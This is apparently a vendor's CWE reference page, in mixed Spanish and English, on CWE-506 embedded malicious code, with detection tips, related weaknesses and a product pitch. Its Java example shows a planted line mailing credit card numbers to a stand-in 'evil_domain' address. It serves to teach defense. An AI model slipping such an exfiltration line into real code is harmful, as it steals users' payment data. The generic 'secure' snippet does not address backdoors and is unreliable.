According to SOAR [REF-1479], the following detection techniques may be useful: ``` Cost effective for partial coverage: ``` Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies Generated Code Inspection
CWE-506 Clase Incompleto
Embedded Malicious Code
This vulnerability occurs when an application or codebase contains intentionally harmful code inserted by a developer or third party.
Definición
What is CWE-506?
This vulnerability occurs when an application or codebase contains intentionally harmful code inserted by a developer or third party.
Often called a Trojan horse, logic bomb, time bomb, or backdoor, this malicious code is designed to perform a legitimate function while secretly exploiting the system's permissions. The developer who inserts it typically aims to bypass security controls, steal data, or cause damage at a specific future trigger, abusing the trust placed in the application.
Detecting these intentional flaws requires scrutinizing code for unexpected behaviors, hidden payloads, or suspicious time-based logic. Managing this risk at scale is difficult; an ASPM platform like Plexicus can help by correlating SAST findings with behavioral anomalies and using AI to prioritize these high-severity, intentional threats across your entire software supply chain.
Impacto en el mundo real
Real-world CVEs caused by CWE-506
-
A command history tool was shipped with a code-execution backdoor inserted by a malicious party.
Cómo lo explotan los atacantes
Ruta del atacante paso a paso
- 1
Identifica una ruta de código que maneje entrada no confiable sin validación.
- 2
Crea un payload que ejercite el comportamiento inseguro — inyección, traversal, overflow o abuso de lógica.
- 3
Envía el payload a través de una solicitud normal y observa la reacción de la aplicación.
- 4
Itera hasta que la respuesta filtre datos, ejecute código del atacante o escale privilegios.
Ejemplo de código vulnerable
Vulnerable Java
In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) {
```
// Authorize credit card.*
*...*
mailCardNumber(ccn, "evil_developer@evil_domain.com");} Ejemplo de código seguro
Secure pseudo
// Validate, sanitize, or use a safe API before reaching the sink.
function handleRequest(input) {
const safe = validateAndEscape(input);
return executeWithGuards(safe);
} What changed: the unsafe sink is replaced (or the input is validated/escaped) so the same payload no longer triggers the weakness.
Lista de prevención
How to prevent CWE-506
- Testing Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
Señales de detección
How to detect CWE-506
According to SOAR [REF-1479], the following detection techniques may be useful: ``` Cost effective for partial coverage: ``` Automated Monitored Execution
According to SOAR [REF-1479], the following detection techniques may be useful: ``` Cost effective for partial coverage: ``` Manual Source Code Review (not inspections)
According to SOAR [REF-1479], the following detection techniques may be useful: ``` Cost effective for partial coverage: ``` Origin Analysis
Plexicus detecta automáticamente CWE-506 y abre un PR de corrección en menos de 60 segundos.
Codex Remedium escanea cada commit, identifica esta debilidad concreta y entrega un pull request listo para revisión con el parche. Sin tickets. Sin traspasos.
Preguntas frecuentes ¿Qué es CWE-506?
¿Qué gravedad tiene CWE-506?
¿Qué lenguajes o plataformas se ven afectados por CWE-506?
¿Cómo puedo prevenir CWE-506?
¿Cómo detecta y corrige Plexicus CWE-506?
¿Dónde puedo aprender más sobre CWE-506?
Frequently asked questions
¿Qué es CWE-506?
This vulnerability occurs when an application or codebase contains intentionally harmful code inserted by a developer or third party.
¿Qué gravedad tiene CWE-506?
MITRE no ha publicado una calificación de probabilidad de explotación para esta debilidad. Trátala como de impacto medio hasta que tu modelo de amenazas demuestre lo contrario.
¿Qué lenguajes o plataformas se ven afectados por CWE-506?
MITRE no ha especificado plataformas afectadas para esta CWE — puede aplicar a la mayoría de los stacks de aplicaciones.
¿Cómo puedo prevenir CWE-506?
Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
¿Cómo detecta y corrige Plexicus CWE-506?
El motor SAST de Plexicus detecta la firma de flujo de datos para CWE-506 en cada commit. Cuando hay coincidencia, nuestro agente Codex Remedium abre un PR de corrección con el código corregido, las pruebas y un resumen de una línea para el revisor.
¿Dónde puedo aprender más sobre CWE-506?
MITRE publica la definición canónica en https://cwe.mitre.org/data/definitions/506.html. También puedes consultar la documentación de OWASP y NIST para guías relacionadas.
Debilidades relacionadas
Weaknesses related to CWE-506
CWE-912 Padre
Hidden Functionality
Hidden functionality refers to undocumented features, commands, or code within a product that are not part of its official specification…
CWE-1242 Hermano
Inclusion of Undocumented Features or Chicken Bits
This vulnerability occurs when a hardware device or chip includes undocumented configuration bits (often called 'chicken bits') or hidden…
CWE-507 Hijo
Trojan Horse
A Trojan Horse vulnerability occurs when software presents itself as legitimate and useful, but secretly contains malicious functionality…
CWE-510 Hijo
Trapdoor
A trapdoor, often called a backdoor, is a hidden piece of code intentionally placed within software. It activates in response to a…
CWE-511 Hijo
Logic/Time Bomb
A logic or time bomb is malicious code intentionally placed within software to trigger harmful actions when a specific condition is met or…
CWE-512 Hijo
Spyware
Spyware is software that secretly gathers personal information about a user or their activities. It does this by accessing data from other…
Recursos
Further reading
- MITRE — CWE-506 oficial https://cwe.mitre.org/data/definitions/506.html
- A Taxonomy of Computer Program Security Flaws, with Examples https://cwe.mitre.org/documents/sources/ATaxonomyofComputerProgramSecurityFlawswithExamples%5BLandwehr93%5D.pdf
- State-of-the-Art Resources (SOAR) for Software Vulnerability Detection, Test, and Evaluation https://www.ida.org/-/media/feature/publications/s/st/stateoftheart-resources-soar-for-software-vulnerability-detection-test-and-evaluation/p-5061.ashx
Listo cuando tú lo estés
Deja de pagar por desarrollador.
Empieza a cerrar el bucle.
Plexicus es el ASPM nativo de IA que escanea, filtra, corrige, pentestea y explica — de forma autónoma. Desarrolladores ilimitados, repos ilimitados, acciones de IA de uso justo. Nivel gratuito real, €269/mo anual cuando estés listo.